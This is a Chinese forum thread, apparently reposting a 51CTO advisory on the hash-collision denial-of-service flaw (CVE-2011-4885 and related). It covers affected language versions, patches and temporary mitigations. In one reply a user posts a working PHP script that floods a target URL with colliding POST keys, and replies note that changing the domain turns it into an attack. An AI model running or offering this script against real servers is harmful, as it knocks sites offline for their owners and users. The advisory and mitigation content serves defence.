【严重】哈希表多碰撞实现拒绝服务攻击

mygirl

【51CTO快讯】前日有信息显示当前包括PHP、Java、Ruby在内的很多语言版本存在漏洞，PHP官方开发组成员Laruence表示攻击者可以通过构造Hash冲突实现拒绝服务攻击，并提供了实例。这个攻击方法危害很高，攻击成本也很小，一个台式机可以轻松搞垮数十台、上百台服务器。

此漏洞一出，相当于随便一个攻击者就可以DDoS掉世界上的大部分网站！危害等级绝对是核弹级别。因此，PHP官方开发组紧急发布了补丁，请大家尽速修补。

PHP方面，<= 5.3.8, <= 5.4.0RC3的所有版本均会受此漏洞影响。PHP 5.3.9和PHP 5.4.0已经包含了针对此漏洞的补丁，但由于两个版本目前仍然在RC状态，无法用于生产服务器升级。至于PHP 5.2，官方开发组表示不会为了这个漏洞发布新版。



官方目前提供的解决方案是给自己的PHP环境打一个Patch，5.2和5.3都可以使用。Patch地址如下：

https://github.com/laruence/laru ... -5.2-max-input-vars

使用方法：

1. cd 到 php src，运行： patch -p1 < php-5.2.*-max-input-vars.patch
2. 最新的 PHP 5.3.9-RC4 已经修复了本漏洞，5.3 的用户可以直接升级到 5.3.9-RC4 。
   当然，如果您不想更新到一个RC版本，那么也可以很简单的修改上面这个补丁，应用到 5.3 的相应版本上。
Laruence还建议其他语言java, ruby等，请各位也预先想好对策，限制post_size是治标不治本的方法，不过可以用来做临时解决方案。

临时解决方案参考：五四陈科学院
不过此方法治标不治本此外，微软也已经紧急发布了更新，修复了ASP.net上的该漏洞：

http://netsecurity.51cto.com/art/201112/310628.htm

查询清单

目前已知的受影响的语言以及版本有::

Java, 所有版本
JRuby <= 1.6.5
PHP <= 5.3.8, <= 5.4.0RC3
Python, 所有版本
Rubinius, 所有版本
Ruby <= 1.8.7-p356
Apache Geronimo, 所有版本
Apache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22
Oracle Glassfish <= 3.1.1
Jetty, 所有版本
Plone, 所有版本
Rack, 所有版本
V8 JavaScript Engine, 所有版本
不受此影响的语言或者修复版本的语言有::

PHP >= 5.3.9, >= 5.4.0RC4
JRuby >= 1.6.5.1
Ruby >= 1.8.7-p357, 1.9.x
Apache Tomcat >= 5.5.35, >= 6.0.35, >= 7.0.23
Oracle Glassfish, N/A (Oracle reports that the issue is fixed in the main codeline and scheduled for a future CPU)
CVE: CVE-2011-4885 (PHP), CVE-2011-4461 (Jetty), CVE-2011-4838 (JRuby), CVE-2011-4462 (Plone), CVE-2011-4815 (Ruby)
-----------------------------------------------------------------------------
此漏洞很严重 请大家务必升级
附上测试截图一只

leoiceo

必须知道

hard_work_study

果断的要关注

houwenhui

果断补丁去

8533722

如何测试？

sendy-2008

谢谢提醒，我星期六就升级了，上了个RC版本....

sendy-2008

<?php
$size = pow(2, 16);
$array = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.XXXXX.com/index.php");
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
        #$array[$key] = 0;
        $argument.="a[".$key."]=0&";
}
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, '0');
curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)');

$return['result'] = curl_exec($ch);
$return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
?>

1314it

这问题很严重，用恶意代码测试，服务器瞬间挂掉。

修改nginx 中 client_max_body_size=10k可临时解决。(应用不同，这个值也不一样。我设置的是100k)

上传了一个附件，详细信息大家可以看这个文档。

sendy-2008

把上面那段代表复制，修改域名，就可以形成攻击测试脚本......

yoyoyu1999

我有一台服务器用的是wamp我想请教一下，这种如何升级PHP呢？

bikong0411

不错~

sendy-2008

yoyoyu1999 发表于 2012-1-4 08:48
我有一台服务器用的是wamp我想请教一下，这种如何升级PHP呢？

不是手动编译？？那就直接下载相应win版本装上去呗

sendy-2008

8533722 发表于 2012-1-3 13:46
如何测试？

复制我贴出那段，修改域名就行了..

yang12313

果断关注

ahwind

春节临近 趁早吧